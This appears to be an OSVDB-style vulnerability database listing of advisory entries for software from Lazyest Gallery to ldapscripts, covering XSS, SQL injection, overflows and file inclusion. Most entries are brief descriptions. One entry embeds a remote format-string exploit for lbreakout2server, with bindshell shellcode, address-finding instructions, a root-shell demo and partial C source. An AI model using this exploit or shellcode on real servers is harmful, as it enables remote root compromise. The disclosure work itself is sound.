| OSVDB ID | Disclosure Date | Title |
|---|
|
71057
Description:
Lazyest Gallery Plugin for WordPress contains a flaw that allows a remote cross-site scripting (XSS) attack. This flaw exists because the application does not validate the 'image' parameter upon submission to the wp-content/plugins/lazyest-gallery/lazyest-popup.php script. This may allow a user to create a specially crafted URL that would execute arbitrary script code in a user's browser within the trust relationship between their browser and the server.
|
2011-03-10
|
Lazyest Gallery Plugin for WordPress /wp-content/plugins/lazyest-gallery/lazyest-popup.php image Parameter XSS
|
|
7753
Description:
(Description Provided by CVE) : Directory traversal vulnerability in Search.cgi in Leoboard LB5000 LB5000II 1029 and earlier allows remote attackers to overwrite files and gain privileges via .. (dot dot) sequences in the amembernamecookie cookie.
|
2001-10-30
|
LB5000 Search.cgi amembernamecookie Cookie Privilege Escalation
|
|
8181
Description:
LBE Web HelpDesk contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is that the 'id' parameter within jobedit.asp is not verified properly and will allow an attacker to inject or manipulate SQL queries.
|
2004-07-22
|
LBE Web HelpDesk jobedit.asp id Parameter SQL Injection
|
|
33367
Description:
(Description Provided by CVE) : lblog stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for a certain file in admin/db/newFolder/.
|
2007-01-02
|
lblog /admin/db/newFolder/ Direct Request Database Disclosure
|
|
28036
Description:
LBlog contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'comments.asp' script not properly sanitizing user-supplied input to the 'id' variable. This may allow an attacker to inject or manipulate SQL queries in the back-end database.
|
2006-08-20
|
LBlog comments.asp id Parameter SQL Injection
|
|
1584
Description:
(Description Provided by CVE) : Heap overflow in savestr function in LBNL traceroute 1.4a5 and earlier allows a local user to execute arbitrary commands via the -g option.
|
2000-09-28
|
LBNL traceroute -g Option Local Overflow
|
|
4025
Description:
LBreakout contains a flaw that may allow a malicious user to escalate their privileges on a vulnerable system. The issue is triggered by a boundary error in the handling of the HOME environment variables. It is possible that the flaw may allow a buffer overflow and potentially execute code with group "games" privileges resulting in a loss of confidentiality, integrity, and/or availability.
|
2004-02-23
|
LBreakout HOME Environment Variable Local Overflow
|
|
16569
Description:
Unknown / Incomplete
|
2002-11-24
|
LBreakout Unspecified Input Validation Issues
|
|
16570
Description:
A local overflow exists in LBreakout2. This issue exist because of a boundary error in the handling of certain environment variables resulting in a buffer overflow. With a specially crafted request, a malicious user can cause cause a buffer overflow and potentially execute code with group "games" privileges resulting in a loss of integrity or availability.
|
2005-05-16
|
LBreakout2 Unspecified Buffer Overflow
|
|
2217
Description:
this exploits lbreakout2server[v2-2.5+], the new one. the exploit header explains most of it. i made a function to find the pop/memory location on the server. since this is a bit much work manually: you can only see 1-2 returns at a time, and need to know the server code dealios. the example usage will show that. also, this is not forked. so, if you crash it, you're SOL. (still note, this will NOT work out of the box, without the proper address locations. the exploit comments explain how to get these addresses. also, the server will probably not be ran as root, or shouldn't be. i just run everything as root when i am testing :/) -------------------- example usage -------------------- [v9@localhost v9]$ cc xlbs.c -o xlbs [v9@localhost v9]$ ./xlbs -h localhost -g [*] lbreakout[2-2.5+]: remote format string exploit. [*] by: vade79/v9 v9@fakehalo.deadpig.org (fakehalo) NOTE: i did not add the command to disconnect the user. so, you have to wait roughly a minute before each user (format string placed as a user) times out. basically, wait a minute in-between using it. also, the packets may or may not come back in order. (or come back at all) [*] finding pop value: localhost:8000. 1: (false) 8049b55 2: (false) 80812c0 3: (false) 80860e8 4: (false) 0 5: (false) ffffffff 6: (false) bffffa20 7: (false) 3b238 8: (false) bffffa38 9: (false) 804c906 10: (false) bffffa20 11: (false) 3b491 12: (false) bffffa38 13: (false) 804c950 14: (true) 78787878 [*] the pop value is: 14. [v9@localhost v9]$ ./xlbs -h localhost -t 1 -P 14 -b [*] lbreakout[2-2.5+]: remote format string exploit. [*] by: vade79/v9 v9@fakehalo.deadpig.org (fakehalo) target=localhost:8000 pops=14 dtors=0x0805b170(+0) ret=0x0807ca88(+0) [*] sending code buffer. (net_buffer) [*] sending format string, new .dtors. [*] attempting to connect: localhost:12800. [!] connection failed: localhost:12800. target=localhost:8000 pops=14 dtors=0x0805b170(+4) ret=0x0807ca88(+0) [*] sending code buffer. (net_buffer) [*] sending format string, new .dtors. [*] attempting to connect: localhost:12800. [!] connection failed: localhost:12800. target=localhost:8000 pops=14 dtors=0x0805b170(+8) ret=0x0807ca88(+0) [*] sending code buffer. (net_buffer) [*] sending format string, new .dtors. [*] attempting to connect: localhost:12800. [!] connection failed: localhost:12800. target=localhost:8000 pops=14 dtors=0x0805b170(+12) ret=0x0807ca88(+0) [*] sending code buffer. (net_buffer) [*] sending format string, new .dtors. [*] attempting to connect: localhost:12800. [!] connection failed: localhost:12800. target=localhost:8000 pops=14 dtors=0x0805b170(+16) ret=0x0807ca88(+0) [*] sending code buffer. (net_buffer) [*] sending format string, new .dtors. [*] attempting to connect: localhost:12800. [!] connection failed: localhost:12800. target=localhost:8000 pops=14 dtors=0x0805b170(+20) ret=0x0807ca88(+0) [*] sending code buffer. (net_buffer) [*] sending format string, new .dtors. [*] attempting to connect: localhost:12800. [!] connection failed: localhost:12800. target=localhost:8000 pops=14 dtors=0x0805b170(+24) ret=0x0807ca88(+0) [*] sending code buffer. (net_buffer) [*] sending format string, new .dtors. [*] attempting to connect: localhost:12800. [*] successfully connected: localhost:12800. Linux localhost.localdomain 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6 (disk),10(wheel) -------------------- exploit: xlbs.c -------------------- /*[ lbreakout[2-2.5+]: remote format string exploit. ]* * (only v2-2.5-beta1, or greater versions affected) * * by: vade79/v9 v9@fakehalo.deadpig.org (fakehalo) * * * * lbreakout(2) is a common SDL game included, in at * * least packaged form for many linux distributions. * * it can be found on: * * http://www.freshmeat.net/projects/lbreakout * * http://lgames.sourceforge.net * * * * there exists multiple format string bugs within * * both the client, and the server. these bugs are * * in the form of snprintf(buf1,len,buf2); * * * * this exploit takes advantage of the initial * * login request, found in server/server.c: * * 446:snprintf( name, 20, msg_read_string() ); * * (the size limit(20) does not make a difference) * * * * the shellcode is placed in net_buffer(1024), in * * memory. which is used for all initial udp socket * * reading, but is not cleared. so, the exploit * * works like so: send shellcode(1024 bytes). then, * * send the format string buffer(64 bytes). so, the * * events look like: * * * * first packet: * * [1024 bytes (nops+shellcode)] * * second packet: * * [64 bytes (format string)] * * so, net_buffer(1024) will look like: * * [64 bytes][960 bytes (original shellcode)] * * (only thing the format string buffer overwrites * * are nops) * * * * if you want to add to the platform list, simply * * do as followed: * * ./xlbs -h <hostname> -g * * * * take the "(true)" pop value given. now you have * * the pop value to use. * * * * then, do: objdump -sj.dtors * * /path/to/lbreakout2server * * * * then, take the address given, and add 4 bytes. * * now you have the .dtors address to use. * * * * then, do: objdump -x /path/to/lbreakout2server | * * grep net_buffer | grep -v cur_size * * * * then, take the address given, and add ~200 bytes. * * now you have the return address to use. add ~200 * * bytes because it's a shared buffer, and can get * * overwritten by other users, or yourself. it's * * not likely for a legit packet to be over ~200 * * bytes. the minimum is +64(FMTSIZE) bytes. * * * * i recommend when testing this exploit, using the * * brute force option. ie: "./xlbs -h host.com -b", * * or using an offset of 24("-d 6"), for .dtors. * * * * also, for when lbreakout2server/lbreakout2 is * * setgid games. the -D, and -a command line * * arguments both use the same snprintf() method. * * which can also be exploited locally. * ******************************************************/ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <getopt.h> #include <signal.h> #include <netdb.h> #include <sys/socket.h> #include <sys/types.h> #include <sys/time.h> #include <netinet/in.h> #include <arpa/inet.h> #define CODESIZE 1024 /* 1024 = net_buffer size. */ #define FMTSIZE 64 /* format buffer size. */ #define TIMEOUT 10 /* socket timeouts. */ static char x86_exec[]= /* bindshell(12800), netric. */ "x31xc0x31xdbx31xc9x31xd2xb0x66xb3x01x51" "xb1x06x51xb1x01x51xb1x02x51x8dx0cx24xcd" "x80xb3x02xb1x02x31xc9x51x51x51x80xc1x32" "x66x51xb1x02x66x51x8dx0cx24xb2x10x52x51" "x50x8dx0cx24x89xc2x31xc0xb0x66xcdx80xb3" "x01x53x52x8dx0cx24x31xc0xb0x66x80xc3x03" "xcdx80x31xc0x50x50x52x8dx0cx24xb3x05xb0" "x66xcdx80x89xc3x31xc9x31xc0xb0x3fxcdx80" "x41x31xc0xb0x3fxcdx80x41x31xc0xb0x3fxcd" "x80x31xdbx53x68x6ex2fx73x68x68x2fx2fx62" "x69x89xe3x8dx54x24x08x31xc9x51x53x8dx0c" "x24x31xc0xb0x0bxcdx80x31xc0xb0x01xcdx80"; struct platform { unsigned int pops; unsigned long dtors_addr; unsigned long ret_addr; }; struct platform target[]={ /* { pops,(.dtors addr+4),(net_buffer addr+200). } */ /* 2-2.5-beta1 source, on redhat7.1. */ { 14,(0x805b0ec+4),(0x0807c940+200) }, /* 2-2.5-beta2 source, on redhat7.1. */ { 14,(0x805b16c+4),(0x0807c9c0+200) }, /* put more platforms here. */ { 0,0,0 } }; unsigned short pt=0; /* default platform. */ char *send_packet(char *,unsigned short,char *, unsigned int,unsigned short); char *getfmt(int,int,unsigned int); char *getcode(void); void getshell(char *,unsigned short); void getpops(char *hostname,unsigned short port); void sendcode(char *,unsigned short,int,int, unsigned int); void printe(char *,short); void usage(char *); void sig_alarm(){printe("alarm signal/timeout",1);} int main(int argc,char **argv){ unsigned short port=8000; /* default. */ unsigned short getpop=0; unsigned short brute=0; unsigned short crash=0; int doffset=0; int roffset=0; int pops=0; int chr=0; char *hostname=0; while((chr=getopt(argc,argv,"t:h:p:d:r:P:gbc"))!=EOF){ switch(chr){ case 't': /* change this if more platforms are added. */ if(atoi(optarg)<0||atoi(optarg)>1) usage(argv[0]); pt=atoi(optarg); break; case 'h': if(!hostname&&!(hostname=(char *)strdup(optarg))) printe("main(): allocating memory failed",1); break; case 'p': port=atoi(optarg); break; case 'd': doffset=(atoi(optarg)*4); break; case 'r': roffset=atoi(optarg); break; case 'P': pops=atoi(optarg); break; case 'g': getpop=1; break; case 'b': brute=1; break; case 'c': crash=1; break; default: usage(argv[0]); break; } } if(!hostname) usage(argv[0]); printf( "[*] lbreakout[2-2.5+]: remote format string exploit" ". [*] by: vade79/v9 v9@fakehalo.deadpig.org (fakeh" "alo) "); if(getpop){ getpops(hostname,port); exit(0); } else if(crash){ /* this can sometimes help to activate the code. */ printf("[*] sending server ...
|
2003-06-24
|
lbreakout2server remote format string exploit.
|
|
16587
Description:
Unknown / Incomplete
|
2002-08-02
|
Lcc Compile Time Arbitrary Memory Disclosure
|
|
59899
Description:
(Description Provided by CVE) : LCC-Win32 3.2 compiler, when running on Windows 95, 98, or ME, writes portions of previously used memory after the import table, which could allow attackers to gain sensitive information. NOTE: it has been reported that this problem is due to the OS and not the application.
|
2002-08-02
|
LCC-Win32 Import Table Arbitrary Memory Disclosure
|
|
5158
Description:
(Description Provided by CVE) : Multiple buffer overflows in LCDProc 0.4.1, and possibly other 0.4.x versions up to 0.4.4, allows remote attackers to execute arbitrary code via (1) a long invalid command to parse_all_client_messages function, or (2) long argv command to test_func_func function.
|
2004-04-12
|
LCDProc parse_all_client_messages() Function Multiple Overflows
|
|
13654
Description:
(Description Provided by CVE) : Buffer overflow in LCDproc allows remote attackers to gain root privileges via the screen_add command.
|
2000-04-20
|
LCDproc screen_add Command Remote Overflow
|
|
287
Description:
Unknown / Incomplete
|
2000-01-01
|
LCDproc Server Unauthenticated Access
|
|
5160
Description:
(Description Provided by CVE) : Format string vulnerability in test_func_func in LCDProc 0.4.1 and earlier allows remote attackers to execute arbitrary code via format string specifiers in the str variable.
|
2004-04-12
|
LCDProc test_func_func Format String Command Execution
|
|
5159
Description:
Unknown / Incomplete
|
2004-04-12
|
LCDProc test_func_func Overflow
|
|
52171
Description:
Unknown / Incomplete
|
2009-02-04
|
LCPlayer QT File Handling DoS
|
|
50860
Description:
lcxBBportal contains a flaw that may allow a remote attacker to execute arbitrary commands or code. The issue is due to the 'includes/acp/acp_lcxbbportal.php' script not properly sanitizing user input supplied to the 'phpbb_root_path' parameter. This may allow an attacker to include a file from a third-party remote host that contains commands or code that will be executed by the vulnerable script with the same privileges as the web server.
|
2008-12-04
|
lcxBBportal includes/acp/acp_lcxbbportal.php phpbb_root_path Parameter Remote File Inclusion
|
|
50859
Description:
lcxBBportal contains a flaw that may allow a remote attacker to execute arbitrary commands or code. The issue is due to the 'portal/includes/portal_block.php' script not properly sanitizing user input supplied to the 'phpbb_root_path' parameter. This may allow an attacker to include a file from a third-party remote host that contains commands or code that will be executed by the vulnerable script with the same privileges as the web server.
|
2008-12-04
|
lcxBBportal portal/includes/portal_block.php phpbb_root_path Parameter Remote File Inclusion
|
|
35457
Description:
(Description Provided by CVE) : Untrusted search path vulnerability in lamdaemon.pl in LDAP Account Manager (LAM) before 1.0.0 allows local users to gain privileges via a modified PATH that points to a malicious rm program.
|
2006-03-01
|
LDAP Account Manager (LAM) lamdaemon.pl PATH Subversion Local Privilege Escalation
|
|
14635
Description:
Unknown / Incomplete
|
2005-03-09
|
LDAP Account Manager (LAM) lamdaemon.pl Unspecified Issue
|
|
34538
Description:
(Description Provided by CVE) : lib/modules.inc in LDAP Account Manager (LAM) before 1.3.0 does not escape HTML special characters in LDAP data, which allows remote attackers to have an unknown impact, probably cross-site scripting (XSS).
|
2007-03-28
|
LDAP Account Manager (LAM) lib/modules.inc LDAP Data Input Filtering Weakness
|
|
72098
Description:
LDAP Account Manager contains a flaw that allows a remote cross-site scripting (XSS) attack. This flaw exists because the 'lib/status.inc' script does not validate the 'selfserviceSaveOk' parameter upon submission to the 'templates/login.php' script. This may allow a user to create a specially crafted URL that would execute arbitrary script code in a user's browser within the trust relationship between their browser and the server.
|
2011-04-28
|
LDAP Account Manager templates/login.php selfserviceSaveOk Parameter XSS
|
|
59591
Description:
Unknown / Incomplete
|
2009-10-28
|
LDAP Integration Module for Drupal LDAP Server Unspecified CSRF
|
|
59592
Description:
Unknown / Incomplete
|
2009-10-28
|
LDAP Integration Module for Drupal User LDAP Data Access Restriction Bypass
|
|
59593
Description:
Unknown / Incomplete
|
2009-10-28
|
LDAP Integration Module for Drupal User Management Unspecified Access Restriction Bypass
|
|
59590
Description:
Unknown / Incomplete
|
2009-10-28
|
LDAP Integration Module for Drupal User-defined Server Name XSS
|
|
22828
Description:
(Description Provided by CVE) : Unspecified vulnerability in ldapdiff before 1.1.1 has unknown impact and attack vectors, related to "ldapdiff.conf path construction".
|
2005-02-16
|
ldapdiff ldapdiff.conf Path Construction Unspecified Issue
|
|
41648
Description:
(Description Provided by CVE) : ldapscripts 1.4 and 1.7 sends a password as a command line argument when calling some LDAP programs, which might allow local users to read the password by listing the process and its arguments, as demonstrated by a call to ldappasswd in the _changepassword function.
|
2007-10-06
|
ldapscripts Process Listing Local User Credentials Disclosure
|
